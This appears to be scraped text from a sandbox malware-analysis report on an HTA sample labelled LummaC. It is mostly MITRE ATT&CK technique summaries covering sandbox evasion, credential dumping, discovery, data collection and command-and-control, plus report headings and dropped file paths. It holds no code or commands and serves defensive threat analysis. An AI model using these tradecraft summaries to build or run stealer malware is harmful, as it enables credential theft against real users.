Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report web44.mp4.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nl2ssos.xdo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3grgxygi.kbl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4h4hqyxj.n4j.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4nnbc5p.qqi.ps1

Static File Info

General

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
web44.mp4.hta

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre